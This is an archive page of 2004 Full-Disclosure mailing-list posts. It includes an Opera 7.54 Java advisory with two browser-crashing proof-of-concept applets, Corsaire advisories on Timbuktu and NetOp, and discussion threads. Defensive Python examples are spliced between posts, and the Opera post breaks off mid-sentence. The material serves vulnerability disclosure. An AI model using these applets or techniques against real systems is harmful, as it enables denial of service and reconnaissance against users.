Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com



[Full-Disclosure] Java Vulnerabilities in Opera 7.54

2004-11-19 Thread Marc Schoenefeld
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Illegalaccess.org Advisory: Opera 7.54 Java vulnerabilities
Author: Marc Schönefeld, www.illegalaccess.org
Summary
Opera 7.54 is vulnerable to leakage of the Java sandbox, allowing malicious
applets to gain unacceptable privileges. This allows them to be used for
information gathering (spying) on local identity information and system
configuration, as well as for causing annoying crash effects.
History
Discovery and vendor informed:  01 Sep 2004
Public Disclosure: 19 Nov 2004
Solution
Opera Software has eliminated the vulnerability in current 7.60 beta
versions. The 7.54 version can be cured by applying a patch to the file
opera.policy to achieve the same effect.
Affected Version
Opera 7.54 for all platforms, although several exploits were only tested on
win32. Prior versions may also be affected.
Problem 1: Problem with Java Policy settings
In contrast to other major browsers, which use the Java Plugin, Opera uses
the JRE directly with a proprietary adapter. Opera also introduces its own
default policy, allowing unprivileged applets access to internal
sun packages by specifying in Opera.policy:

grant {
    permission java.lang.RuntimePermission "accessClassInPackage.sun.*";
};
This opens the gate to some undocumented functionality and violates Sun's
guidelines for secure Java programming. These lines should be commented out
to get rid of the vulnerabilities shown in the text below. An attacker could
crash the browser or do other things harmful to the user, as with the
following proof-of-concept, which triggers a native debug assertion:

import sun.awt.font.*;

public class Opera754FontCrashApplet extends java.applet.Applet {

    public void start() {
        int j = javax.swing.JOptionPane.showConfirmDialog(null,
            "Illegalaccess.org | Step1 Opera 754 FontCrash, wanna crash?");
        if (j == 0) {
            // Reachable from an untrusted applet only because Opera's policy grants
            // accessClassInPackage.sun.*; the out-of-range indices trip a native assertion.
            NativeFontWrapper.getFullNameByIndex(Integer.MIN_VALUE);
            NativeFontWrapper.getFullNameByIndex(Integer.MAX_VALUE);
        }
    }
}
The default Java appletviewer, which implements the same security mechanisms
as the Java plugin, complains with the following message instead of
executing the method invocation:

java.security.AccessControlException: access denied
(java.lang.RuntimePermission accessClassInPackage.sun.awt.font)
    at java.security.AccessControlContext.checkPermission(AccessControlContext.java:269)
    at java.security.AccessController.checkPermission(AccessController.java:401)
    at java.lang.SecurityManager.checkPermission(SecurityManager.java:524)
    at java.lang.SecurityManager.checkPackageAccess(SecurityManager.java:1491)
    at sun.applet.AppletSecurity.checkPackageAccess(AppletSecurity.java:190)
    at sun.applet.AppletClassLoader.loadClass(AppletClassLoader.java:119)
    at java.lang.ClassLoader.loadClass(ClassLoader.java:235)
    at java.lang.ClassLoader.loadClassInternal(ClassLoader.java:302)
    at Opera754FontCrashApplet.start(Opera754FontCrashApplet.java:9)
    at sun.applet.AppletPanel.run(AppletPanel.java:377)
    at java.lang.Thread.run(Thread.java:534)

Opera allows all untrusted applets access to these classes by removing the
need to acquire an access permission for sun packages.

In general we recommend that the Opera programmers switch the Opera Java
architecture to the standards-based approach and use the Java plugin.
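The check a practitioner wants here is mechanical: does any unrestricted grant (no codeBase, no signedBy, so it applies to every applet) hand out AllPermission or an accessClassInPackage.sun.* RuntimePermission? The following Python auditor is an added example, not part of this advisory and not Opera's code. The two policy texts are constructed samples in the shape the advisory describes: the vulnerable grant as quoted above, and the same file with the advisory's remedy (the line commented out) plus a codeBase-restricted grant that must not be flagged. The policy grammar it parses is the standard java.policy syntax; the codeBase path in the fixed sample is an assumption.

```python
"""Audit a Java policy file for grants that hand untrusted code the sun.* packages."""
import re
from dataclasses import dataclass

# Constructed sample in the shape the advisory describes (not Opera's actual opera.policy).
VULNERABLE_POLICY = """
// default applet grant: no codeBase, no signedBy, so it applies to every applet
grant {
    permission java.lang.RuntimePermission "accessClassInPackage.sun.*";
    permission java.util.PropertyPermission "java.version", "read";
};
"""

# The advisory's remedy applied: the offending line commented out. The second grant is
# restricted by codeBase (assumed path), applies to trusted code only, and must not be flagged.
FIXED_POLICY = """
grant {
    // permission java.lang.RuntimePermission "accessClassInPackage.sun.*";
    permission java.util.PropertyPermission "java.version", "read";
};

grant codeBase "file:/usr/lib/jvm/lib/ext/*" {
    permission java.security.AllPermission;
};
"""


@dataclass
class Finding:
    grant_header: str   # "grant" or "grant codeBase ..." as written in the file
    permission: str     # the offending permission entry, verbatim


_COMMENTS = re.compile(r"//[^\n]*|/\*.*?\*/", re.S)
# grant <header> { <body> };  -- the header may contain quoted strings, so allow "..." in it
_GRANT = re.compile(r'grant\b((?:[^{"]|"[^"]*")*)\{(.*?)\}\s*;', re.S)
_PERMISSION = re.compile(r'permission\s+([\w.$]+)\s*(?:"([^"]*)")?(?:\s*,\s*"([^"]*)")?\s*;')


def is_dangerous(perm_class: str, target: str) -> bool:
    """AllPermission, or any RuntimePermission that opens the internal sun.* packages
    (the exact grant the advisory found, and narrower variants such as sun.awt.font)."""
    if perm_class == "java.security.AllPermission":
        return True
    return (perm_class == "java.lang.RuntimePermission"
            and target.startswith("accessClassInPackage.sun."))


def audit_policy(text: str) -> list:
    """Return one Finding per dangerous permission inside an unrestricted grant block."""
    findings = []
    for block in _GRANT.finditer(_COMMENTS.sub("", text)):
        header = " ".join(block.group(1).split())
        if re.search(r"\b(codeBase|signedBy|principal)\b", header, re.I):
            continue  # restricted grant: applies only to trusted code, out of scope here
        for perm in _PERMISSION.finditer(block.group(2)):
            perm_class, target = perm.group(1), perm.group(2) or ""
            if is_dangerous(perm_class, target):
                findings.append(Finding(("grant " + header).strip(), perm.group(0)))
    return findings


if __name__ == "__main__":
    for name, policy in (("vulnerable", VULNERABLE_POLICY), ("fixed", FIXED_POLICY)):
        print(name, audit_policy(policy))
```

Run it against a real opera.policy (or any java.policy) by reading the file into audit_policy; an empty result for the unrestricted grant is the state the advisory's fix leaves the file in.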
Problem 2: JRE Packaging
Opera 7.54, which was released Aug 5, 2004, is vulnerable to the XSLT processor
covert channel attack, which was corrected in JRE 1.4.2_05 [released in
July 2004]. To the users' disadvantage, the Opera packagers chose to
bundle JRE 1.4.2_04, while being aware of the official Sun advisory
(http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57613) reporting
this issue, which had been released a few days earlier.
Problem 3: Internal pointer DoS exploitation
Opera.jar contains Opera's replacement for the Java plugin. It therefore
handles communication between JavaScript and the Java VM via the LiveConnect
protocol. The public class EcmaScriptObject exposes a system memory pointer
to the Java address space; by constructing a special variant of this type, an
internal cache table can be polluted with false entries that interfere with the
proper function of the JSObject class and, in the following proof-of-concept,
crash the browser.

import netscape.javascript.*;
import com.opera.*;

public class Opera754EcmaScriptApplet extends java.applet.Applet {

    public void start() {
        PluginContext pc = (PluginContext) this.getAppletContext();

        int jswin = pc.getJSWindow();
        int esrun = pc.getESRuntime();
        // Building an EcmaScriptObject from the raw window pointer pollutes the
        // internal cache; the JSObject lookup that follows then crashes the browser.
        EcmaScriptObject eso4 = EcmaScriptObject.getObject(jswin, 1);
        try {
            JSObject js = JSObject.getWindow(this);
            System.out.println(js);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Problem 4: Exposure of location of local java installation
Sniffing the URL classpath allows to retrieve the URLs of the bootstrap

Re: [Full-Disclosure] Gmail anomaly

2004-11-19 Thread Daniel Veditz
ifconfig_xl0 wrote:
 If you open  two gmail accounts in two different firebird/fox browsers
 the first account logged into after a refresh becomes the second
 account. Or if you send an e-mail with the second account, it may
 send as the first and refresh back as account1.
 
 So if you login with GmailAccount1 and then open another browser and
 log into GA2, go back to GA1 browser and hit refresh, GA1 will be in
 the mailbox of GA2.
 
 This obviously is not a security risk because the mailbox was already
 logged into, but I still thought it was a weird thing to do. It doesnt
 act that way with internet exploder though so it must be something
 with Firefox ...

In Firefox there is only ever one instance of the executable, and all
windows share session cookies (and http auth, which has similar differences
between IE and Firefox).

You get the same behavior from IE if you open new windows from existing
browser windows (crucial for web apps to work). You get a new process that
does not share session information if you launch a new window from the OS
(Desktop link, start menu, command-line, etc).

In practice the difference doesn't matter to the average user, but there are
lots of Bugzilla duplicates filed by power users asking Mozilla to mimic the
IE behavior.

It becomes a minor security problem in conjunction with sites that assume
the IE behavior and which lazily instruct the user to close the browser
window to completely log out rather than reset the session info from the
server side. This is insufficient even for IE if the user opens multiple
windows using Ctrl+N or the File|New menu item.

-Dan Veditz

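The two behaviours Veditz describes, one process-wide session-cookie jar and a site that treats "close the window" as logout, can be modelled with a few lines. The following is an added example, not code from any of the posters or from Gmail; the in-memory session store, the dictionary standing in for the browser's cookie jar, the account names and the idle timeout are all constructed for the demonstration.

```python
"""Server-side session revocation versus 'close the browser window to log out'."""
import secrets


class SessionStore:
    """The server's own session table. Whether a session is live is decided here,
    not by whether the browser still happens to hold the cookie."""

    def __init__(self, idle_timeout=1800):
        self.idle_timeout = idle_timeout
        self._sessions = {}  # session id -> {"user": ..., "last_seen": ...}

    def login(self, user, now):
        sid = secrets.token_urlsafe(32)  # 256 bits of entropy: not guessable
        self._sessions[sid] = {"user": user, "last_seen": now}
        return sid

    def user_for(self, sid, now):
        """Resolve a presented cookie to a user, or None if unknown, revoked or idle too long."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if now - rec["last_seen"] > self.idle_timeout:
            del self._sessions[sid]  # idle expiry is the server's safety net
            return None
        rec["last_seen"] = now
        return rec["user"]

    def logout(self, sid):
        """Real logout: the server forgets the session, so a replayed cookie is worthless."""
        self._sessions.pop(sid, None)


def shared_jar_demo():
    """Two logins through one process-wide cookie jar (the Firefox behaviour above):
    the second login overwrites the cookie the first window relies on."""
    store = SessionStore()
    jar = {}                                       # one jar for every window of the process
    jar["SID"] = store.login("account1", now=0)    # window 1 logs in
    jar["SID"] = store.login("account2", now=1)    # window 2 logs in through the same jar
    return store.user_for(jar["SID"], now=2)       # window 1 refreshes and lands in account2


def close_window_logout_demo():
    """'Log out by closing the window': the browser drops the cookie, but the server was
    never told, so a copy of the cookie captured earlier keeps working."""
    store = SessionStore()
    sid = store.login("alice", now=0)
    captured = sid            # e.g. from a proxy log, or another window on the same machine
    jar = {"SID": sid}
    jar.clear()               # window closed: the session cookie is gone client-side only
    return store.user_for(captured, now=60)


def server_logout_demo():
    """Proper logout: revoke server-side; the same captured cookie is now rejected."""
    store = SessionStore()
    sid = store.login("alice", now=0)
    captured = sid
    store.logout(sid)
    return store.user_for(captured, now=60)


def idle_expiry_demo():
    """A session that is neither refreshed nor revoked dies at idle_timeout."""
    store = SessionStore(idle_timeout=600)
    sid = store.login("bob", now=0)
    return store.user_for(sid, now=601)
```

The point of the contrast is in close_window_logout_demo versus server_logout_demo: a logout link that only clears the cookie leaves the server-side record alive for anyone who holds a copy, which is exactly the gap Veditz notes also exists in IE when a second window was opened with Ctrl+N.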


[Full-Disclosure] Corsaire Security Advisory - Netopia Timbuktu remote buffer overflow issue

2004-11-19 Thread advisories

-- Corsaire Security Advisory --

Title: Netopia Timbuktu remote buffer overflow issue
Date: 20.07.04
Application: Timbuktu v7.0.3
Environment: Mac OS X (10.1, 10.2, 10.3)
Author: Stephen de Vries [EMAIL PROTECTED]
Audience: General release
Reference: c040720-001


-- Scope --

The aim of this document is to define a vulnerability in the Timbuktu 
product for Mac OS X, as supplied by Netopia [1], that allows a remote 
attacker to crash the application and effectively deny service to 
legitimate users.


-- History --

Discovered: 20.07.04 
Vendor notified: 27.08.04
Document released: 19.11.04


-- Overview --

The Timbuktu software is shipped as a client/server application that 
allows remote users to access the desktop of a host system.  The server 
component of this application is vulnerable to a remote buffer overflow 
vulnerability that, when exploited, causes the server process to crash.


-- Analysis --

The server process runs with root privileges on the host Mac OS X and 
listens for client connections on TCP port 407.  By making a number of 
concurrent connections to this port and repeatedly sending a particular 
string of data, a memory buffer is overwritten and the server process 
crashes.  


-- Recommendations --

Upgrade to version v7.0.4 of the Timbuktu application.


-- CVE --

The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CAN-2004-0810 to this issue. This is a candidate for inclusion in 
the CVE list (http://cve.mitre.org), which standardises names for 
security problems.


-- References --

[1] http://www.netopia.com


-- Revision --

a. Initial release.
b. Minor detail revision.


-- Distribution --

This security advisory may be freely distributed, provided that it 
remains unaltered and in its original form. 


-- Disclaimer --

The information contained within this advisory is supplied as-is with 
no warranties or guarantees of fitness of use or otherwise. Corsaire 
accepts no responsibility for any damage caused by the use or misuse of 
this information.


-- About Corsaire --

Corsaire are a leading information security consultancy, founded in 1997 
in Guildford, Surrey, UK. Corsaire bring innovation, integrity and 
analytical rigour to every job, which means fast and dramatic security 
performance improvements. Our services centre on the delivery of 
information security planning, assessment, implementation, management 
and vulnerability research. 

A free guide to selecting a security assessment supplier is available at 
http://www.penetration-testing.com 


Copyright 2004 Corsaire Limited. All rights reserved. 




Re: [Full-Disclosure] SecurityForest - Public Release #1

2004-11-19 Thread Gregory Gilliss
Yeah, I'd like for my country to accumulate all the available computer 
security knowledge too...one heck of a competitive advantage to have.

Registrant:
   Alon Swartz
   Har Sinai St
   Raanana, NA 43307
   Israel

   Registered through: GoDaddy.com
   Domain Name: SECURITYFOREST.COM
  Created on: 14-Sep-04
  Expires on: 14-Sep-05
  Last Updated on: 14-Sep-04

   Administrative Contact:
  Swartz, Alon  [EMAIL PROTECTED]
  Har Sinai St
  Raanana, NA 43307
  Israel
  97745657  Fax --
   Technical Contact:
  Swartz, Alon  [EMAIL PROTECTED]
  Har Sinai St
  Raanana, NA 43307
  Israel
  97745657  Fax --

   Domain servers in listed order:
  NS1.EVERYDNS.NET
  NS2.EVERYDNS.NET

Pity the US is so busy scaring the population that they have no time to
come up with ideas like this...

-- Greg

On or about 2004.11.19 12:41:29 +, [EMAIL PROTECTED] ([EMAIL PROTECTED]) 
said:

 Community Website: http://www.securityforest.com
 Community IRC channel: irc://irc.unixgods.net:/securityforest
 
 
 Table of contents
 =
   Summary
   The Open Source Idea
   Tree's in the Forest
 ExploitTree
 ToolTree
 TutorialTree
 LinkTree
   GreenHouse
   Thanks
 
 
 Summary
 ===
 SecurityForest.com is a collaboratively edited Forest consisting of Trees 
 which anyone can contribute to. SecurityForest's trees are specific security 
 repositories that are categorized for practical reasons. The technologies 
 currently in use in these repositories are based on Wiki technology and CVS 
 (Concurrent Versioning System) technology. Depending on the species of the 
 tree - the suitable technology will be used. SecurityForest.com is a 
 collection of repositories (trees) for the community - by the community. In 
 other words - the updating, modifying and improving can be done by anyone in 
 the community.
 This public release is posted at 
 http://www.securityforest.com/wiki/index.php?title=SecurityForest_-_Public_Release_no.1
 
 
 The Open Source Idea
 
 The basic idea behind Open Source is very simple: When people can read, 
 modify and improve a piece of software, the software evolves. People improve 
 it, people adapt it, people fix bugs. And this can happen at a speed that, if 
 one is used to the slow pace of conventional development, seems astonishing.
 We at SecurityForest have learned that this rapid evolutionary process 
 produces better results than the traditional closed model, in which only very 
 few people improve the Security Repositories and everybody else must use what 
 these individuals have come across and added. SecurityForest is not only 
 based on OpenSource software, but itself is opensource meaning the updating, 
 modifying and improving can be done by anyone in the community.
 
 
 Tree's in the Forest
 

SNIP 

-- 
Gregory A. Gilliss, CISSP  E-mail: [EMAIL PROTECTED]
Computer Security WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3



RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Crotty, Edward
I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1.

There is such a thing as runas for Windows.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of devis
Sent: Friday, November 19, 2004 11:10 AM
Cc: [EMAIL PROTECTED]
Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox


Re: [Full-Disclosure] Time Expiry Alogorithm??

2004-11-19 Thread Pavel Kankovsky
On Fri, 19 Nov 2004, Gautam R. Singh wrote:

 I was just wondering is there any encryption algorithm which expires
 with time.  For example an email message maybe decrypted within 48
 hours of its delivery otherwise it become useless or can't be decrypted
 with the original key

No.

If a certain deterministic computation (e.g. decryption) can be made in
time T, then it can be made in any time T' > T. Even if the computation 
needs cooperation by your computer that refuses to cooperate when the 
time limit expires (e.g. the recipient of the message needs to ask you 
for an extra key), you can always do the computation once and save the 
result (e.g. the plaintext). Well, I admit, this holds unless your 
computer has been possessed by Palladium (and is not *your* computer 
anymore).

On the other hand, the power of hardware as well as the knowledge of
cryptanalysis increases as the time passes, ergo any cipher is going to
expire...in the sense someone will become able to break it and recover 
the plaintext without the (a priori) knowledge of the encryption key.

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
Resistance is futile. Open your source code and prepare for assimilation.



Re: [Full-Disclosure] Time Expiry Alogorithm??

2004-11-19 Thread Valdis . Kletnieks
On Fri, 19 Nov 2004 13:09:19 +0530, Gautam R. Singh said:

 I was just wondering is there any encryption algorithm which expires with time.
 For example an email message maybe decrypted within 48 hours of its
 delivery otherwise it become useless or can't be decrypted with the
 original key

So now it's 3 weeks later, and I can't read the email...

So I set the date on the PC back 20 days, and now it's within 48 hours
of delivery.  Now, what was this about unreadable?

You really can't make this dog hunt without a tamper-proof time source
(a smart card or dongle or similar).

(And yes, I know they're not *REALLY* tamper-proof - but getting into a
smart card is a lot harder than resetting the date... ;)




Re: [Full-Disclosure] University Researchers Challenge Bush Win In Florida

2004-11-19 Thread Paul Schmehl
--On Friday, November 19, 2004 12:12:10 AM + Jason Coombs 
[EMAIL PROTECTED] wrote:
http://www.computerworld.com/governmenttopics/government/policy/story/0,1
0801,97614,00.html?nas=PM-97614
I wouldn't trust anything coming out of Bezerkley without confirmation from 
competent researchers elsewhere.  Furthermore, their more esteemed 
colleagues at CalTech already disagree with them.

http://www.vote.caltech.edu/Reports/Florida_discrepancy3.pdf
Even *if* they are correct (which is at least debatable) the 130,000 vote 
discrepancy they argue for won't overcome Bush's lead of 380,000, so this 
is, at best, an academic exercise.

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu


[Full-Disclosure] Why is IRC still around?

2004-11-19 Thread Danny
Well, it sure does help the anti-virus (anti-malware) and security
consulting business, but besides that... is it not safe to say that:

1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
2) A considerable amount of script kiddies originate and grow through IRC?
3) A wee bit of software piracy occurs?
4) That many organized DoS attacks through PC zombies are initiated through IRC?
5) The anonymity of the whole thing helps to foster all the illegal
and malicious activity that occurs?
The list goes on and on...

Sorry to offend those that use IRC legitimately (LOL - find something
else to chat with your buddies), but why the hell are we not pushing
to sunset IRC?

What would IT be like today without IRC (or the like)? Am I narrow
minded to say that it would be a much safer place?

...D



[Full-Disclosure] Re: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.

2004-11-19 Thread broeker
On Thu, 18 Nov 2004, rexolab wrote:

VulnDiscovery:2003/05/21
Release Date :2004/11/17

Surely you're joking, Mr. Gangstuck.  You can't seriously be telling us
you sat on this for no less than 18 months, without telling anybody about
it.

Actually, I somewhat doubt you even discovered this yourself --- what with
this very bug having been posted to cscope's bugtracker on 2004-11-09.

Status   :vendor has just been notified.

Actually, we were notified 11 days ago, and apparently not by you.

First, the temporary directory (P_tmpdir=/tmp) is badly handled 
in every myfopen() internal call.

[... there doesn't seem to be a second, to that first...]

Anyway, you're right, the vulnerability is there.  Unfortunately your
patch is not quite sufficient to close it, because you overlooked 
that temp2, one of the two predictable filenames, is also used to
construct an output redirection for a shell command run by cscope.

-- 
Hans-Bernhard Broeker ([EMAIL PROTECTED])
Even if all the snow were burnt, ashes would remain.




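Safe temporary-file handling of the kind this reply calls for, as an added example that is neither cscope's code nor the posted patch: it contrasts a PID-derived name in the shared /tmp with a private mkdtemp directory plus an O_EXCL open, and binds the command's output to the open descriptor instead of splicing the path into a shell redirection. The names `cscope-` and `temp2` are labels borrowed from the thread, not cscope internals; a POSIX host is assumed.

```python
"""Temporary-file handling hardened against the two defects the cscope
reply describes.  Added example, not cscope's code: "cscope" in the names
below is only a label.  Assumes a POSIX host (symlinks, /tmp)."""
from __future__ import annotations

import os
import shutil
import subprocess
import sys
import tempfile


def predictable_temp_name(pid: int, tmpdir: str = "/tmp") -> str:
    """The pattern at fault: a name derived from the PID under a shared,
    world-writable directory.  Any local user can compute it ahead of time
    and leave a symlink there, so a later open() follows the link."""
    return os.path.join(tmpdir, f"cscope{pid}.2")


def open_private_temp() -> tuple[int, str]:
    """Create a temp file that cannot be pre-planted.

    mkdtemp() makes a fresh mode-0700 directory with an unpredictable name,
    and O_CREAT|O_EXCL makes open() fail with EEXIST if anything (a symlink
    included) already sits at the path, instead of following it.
    """
    private_dir = tempfile.mkdtemp(prefix="cscope-")
    path = os.path.join(private_dir, "temp2")
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    return fd, path


def run_to_private_temp(argv: list[str]) -> str:
    """Run argv with stdout bound to a private temp file, with no shell.

    The second defect in the thread is 'cmd > ' + temp2 handed to a shell:
    the shell re-resolves the path, so a link planted at temp2 turns the
    command's output into an overwrite of whatever the link targets.
    Passing the already-open descriptor means the kernel writes to the
    inode we created, whatever the name points at by then.
    """
    fd, path = open_private_temp()
    try:
        try:
            subprocess.run(argv, stdout=fd, check=True)
        finally:
            os.close(fd)
        with open(path, encoding="utf-8") as fh:
            return fh.read()
    finally:
        shutil.rmtree(os.path.dirname(path), ignore_errors=True)


def capture_python_output(code: str) -> str:
    """Wrapper for the self-test: run a Python one-liner through the
    hardened path and return what it wrote."""
    return run_to_private_temp([sys.executable, "-c", code])


def excl_open_refuses_planted_link() -> bool:
    """Self-check of the guard: plant a symlink at the name we intend to
    use (the precondition the reply describes) and confirm that the
    O_EXCL open is refused and the link target is left untouched."""
    scratch = tempfile.mkdtemp(prefix="cscope-check-")
    try:
        victim = os.path.join(scratch, "victim")
        with open(victim, "w", encoding="utf-8") as fh:
            fh.write("original\n")
        planted = os.path.join(scratch, "temp2")
        os.symlink(victim, planted)
        try:
            fd = os.open(planted, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        except FileExistsError:
            refused = True
        else:
            os.close(fd)
            refused = False
        with open(victim, encoding="utf-8") as fh:
            return refused and fh.read() == "original\n"
    finally:
        shutil.rmtree(scratch, ignore_errors=True)


if __name__ == "__main__":
    print("predictable name:", predictable_temp_name(os.getpid()))
    print("captured:", capture_python_output("print('hello')"), end="")
    print("O_EXCL guard holds:", excl_open_refuses_planted_link())
```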


[Full-Disclosure] Corsaire Security Advisory - Danware NetOp Host multiple information disclosure issues

2004-11-19 Thread advisories

-- Corsaire Security Advisory --

Title: Danware NetOp Host multiple information disclosure issues
Date: 19.06.04
Application: Danware NetOp prior to 7.65 build 2004278
Environment: Windows NT/2000/2003/XP/98
Author: Martin O'Neal [EMAIL PROTECTED]
Audience: General release
Reference: c040619-001


-- Scope --

The aim of this document is to clearly define several vulnerabilities in 
the NetOp Host product, as supplied by Danware Data A/S [1], that 
disclose information about the host that would be of use to an attacker.


-- History --

Discovered: 19.06.04 (Martin O'Neal)
Vendor notified: 23.06.04
Document released: 19.11.04


-- Overview --

The Danware NetOp Host and Guest products provide remote control 
capabilities for a variety of operating systems. The data exchange 
between the Guest and Host can be protected by both authentication and 
encryption, but even with these options enabled the NetOp proprietary 
protocol can still disclose the hostname, username and local IP address 
of the host system.


-- Analysis --

The NetOp Host and Guest products use a number of standard transport 
protocols (such as UDP, TCP and IPX) to encapsulate a proprietary data 
exchange through which remote control services are provided. This 
proprietary exchange can be protected by a number of optional features, 
such as authentication and data encryption. However, early on in the 
session initiation process (prior to both authentication and encryption 
being enforced), it is still possible for the hostname, username and 
local IP address of the host system to be disclosed.

If a valid NetOp HELO request is sent to the host, then it responds with 
a packet that may contain one or more of the NetOp hostname, username 
and local IP address values. Although the hostname option can be 
overridden, the default setting is to use the Windows computer name. If 
enabled, the username returned will be the name of the currently logged-in 
user (if any). Additionally, if the system is protected by a firewall or 
other device that provides NAT services between private and public 
address ranges, then the private addressing information will be 
disclosed. 

The NetOp products provide an option to disable making this information 
public; however, in versions prior to 7.65 build 2004278 this does not 
work as intended, and can be bypassed with the use of a custom HELO 
request. 

Although none of these disclosures are critical in themselves, they
provide additional information that may be combined with other
vulnerabilities to launch further attacks against the host.


-- Recommendations --

Upgrade to NetOp 7.65 build 2004278. 

Under the options Host Name tab, uncheck the Public Host name option.

If upgrading to NetOp 7.65 build 2004278 is not feasible, the following
workaround eliminates most disclosures of the computer and user name,
but does not protect against disclosing the private addressing through a
NAT gateway:

Under the options Host Name tab, select the Enter name or leave name 
field blank radio button, and uncheck both the Public Host name and 
Enable User Name options.  In the name entry field then appearing on
the main program screen, actually leave the name field blank.

For those who are unsure if they have NetOp installed within their 
environment, or whether the configuration options are correctly 
configured, Corsaire (in collaboration with Danware) have provided a 
NASL signature for Nessus [2] that will provide the appropriate positive 
verification.  


-- CVE --

The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CAN-2004-0950 to this issue. This is a candidate for inclusion in 
the CVE list (http://cve.mitre.org), which standardises names for 
security problems.


-- References --

[1] http://www.danware.com
[2] http://www.nessus.org


-- Revision --

a. Initial release.


-- Distribution --

This security advisory may be freely distributed, provided that it 
remains unaltered and in its original form. 


-- Disclaimer --

The information contained within this advisory is supplied as-is with 
no warranties or guarantees of fitness of use or otherwise. Corsaire 
accepts no responsibility for any damage caused by the use or misuse of 
this information.


-- About Corsaire --

Corsaire are a leading information security consultancy, founded in 1997 
in Guildford, Surrey, UK. Corsaire bring innovation, integrity and 
analytical rigour to every job, which means fast and dramatic security 
performance improvements. Our services centre on the delivery of 
information security planning, assessment, implementation, management 
and vulnerability research. 

A free guide to selecting a security assessment supplier is available at 
http://www.penetration-testing.com 


Copyright 2004 Corsaire Limited. All rights reserved. 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Sober.I worm is here

2004-11-19 Thread Danny
On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote:
 can you define medium sized epidemic?
 Any new features / functionality?

Not too much, except for the fact that it also arrives with the
following attachment extensions: .doc, .txt, and .word

Which are not typically blocked by layer 7 aware firewalls. Whereas,
the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked.

...D

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox

2004-11-19 Thread Todd Towles
Windows doesn't tell you about the Admin account and makes the default
user an Admin. That isn't the best method, as you know. 

RunAs is great..but that is only good once you create a normal user -
and then delete your new default user. Or you log in as Administrator
and take away the full control of the default user. Easy for the average
Windows user? Nope. If it was, Microsoft would make the default user (note
USER) and then let you configure the Admin account on start. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Crotty, Edward
 Sent: Friday, November 19, 2004 12:13 PM
 To: [EMAIL PROTECTED]
 Subject: RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 I'm not a Win based guy (troll?) - Un*x here - and even I was 
 offended by #1.
 
 There is such a thing as runas for Windows.
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] Behalf Of devis
 Sent: Friday, November 19, 2004 11:10 AM
 Cc: [EMAIL PROTECTED]
 Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 This message is primarily destined to all MS trolls, no 
 matter their levels, and I can see so many in this list that 
 I am happy to target a large audience.
 
 Please run some unix or at least read about the unix 
 permission system, and let's pray god this sheds some light in 
 your mono cultured brains. 
 Here are the relevant points:
 
 1) Despite recent ameliorations of MS ( multi user finally, 
 permissions ... ) and some effort at making the system more 
 secure, something very important is still left out: The first 
 default user of the MS computer is made an administrator. 
 This comes down to giving uid0 to your first unix user. Unix 
 does NOT do that. It requires you to use su and become root 
 ( administrator ) after proper credentials submission ( password ). 
 The first user is NOT an administrator, and any recent Unix 
 documentation will insist on the danger of running as 
 root(admin). Unix keeps the admin account well separated from 
 the user account, which MS DOESN'T, despite all wrong 
 arguments I read on this list. VERY BAD practice generally. 
 So it's user friendly, as the user has admin rights and can 
 therefore install and remove software and change major 
 configuration. The majority of users don't and will never know 
 there is an 'administrator' user that hides from their eyes.
 This little detail that apparently MS people can't 
 'understand' is a huge step. Please install a proper unix, 
 create 2 accounts and try to read the home directory of the 
 second user from the first.
 
 2) After all, they don't need to know.  You're on a need 
 to know basis job
 Do MS really think the users are stupid ? Is understanding 
 different IDs/ roles / accounts on a computer that much of a 
 tough message to pass to the end user ? Isn't security 
 important and supposedly the goal of recent MS developments 
 ? If they really did target security, their efforts would have 
 gone into making the user understand that he should be admin 
 to install programs, and a non privileged user to surf the web. 
 Is that that hard to understand ? And that much hidden into 
 high IT security professional unreachable knowledge ? I 
 don't think so. Doesn't a company such as MS have enough 
 resources to make that a priority and educate the users ? 
 Of course it has. Just not very 'commercially' 
 friendly as if users then understand roles, it might require 
 less Anti virus, personal firewall and other bullshit FUD 
 scareware ( Yes it's scareware, and it is the best selling 
 software category OF ALL times of software history ).
 
 
 This is why, Firefox being independent from this OS that 
 carries 60 of its code base as being legacy code for older 
 system hardware and backward compatibility, is likely more 
 secure than the in house integrated application. Now if you are 
 running Firefox as an administrator .don't be surprised 
 if something happens. Don't blame the software, but your poor 
 security practices.
 
 Let's not hide from ourselves what's needed from MS to reach 
 modern world
 security:
 a complete rewrite, and a ditch of old Dos base and the 20 
 years old legacy code.
 
 Hope that clears things.
 
 
 
